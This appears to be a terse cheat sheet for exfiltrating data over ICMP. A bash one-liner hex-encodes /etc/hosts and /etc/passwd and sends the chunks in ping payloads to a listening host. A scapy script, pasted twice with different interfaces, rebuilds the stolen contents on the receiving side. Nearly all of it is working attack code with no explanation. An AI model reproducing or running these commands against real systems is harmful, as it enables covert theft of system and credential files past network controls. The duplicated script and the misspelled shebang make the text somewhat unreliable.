sudo tcpdump -i lo -w capture.cap -n -v
xxd -p -c 4 /etc/hosts| while read line; do ping -c 1 -p $line 127.0.0.1; done
from scapy.all import *
rdpcap("capture.cap")
packets=rdpcap("capture.cap")
>>> packets[0][ICMP].load
#!/usr/bin/pytyhon3
from scapy.all import ICMP, sniff
import signal, time, sys
#Ctrl_c
def def_handler(sig, frame):
print("[+] Saliendo ... ")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def data_parser(packet):
if packet.haslayer(ICMP):
if packet[ICMP].type == 8:
data = packet[ICMP].load[-4:].decode("utf-8")
print(data, flush=True, end='')
if __name__=='__main__':
sniff(iface="tun0", prn=data_parser)
sudo python3 icmp_exfiltration
#!/usr/bin/pytyhon3
from scapy.all import ICMP, sniff
import signal, time, sys
#Ctrl_c
def def_handler(sig, frame):
print("[+] Saliendo ... ")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
def data_parser(packet):
if packet.haslayer(ICMP):
if packet[ICMP].type == 8:
data = packet[ICMP].load[-4:].decode("utf-8")
print(data, flush=True, end='')
if __name__=='__main__':
sniff(iface="eth0", prn=data_parser)
xxd -p -c 4 /etc/passwd| while read line; do ping -c 1 -p $line 192.168.1.5; done
sudo python3 icmp_exfiltration.py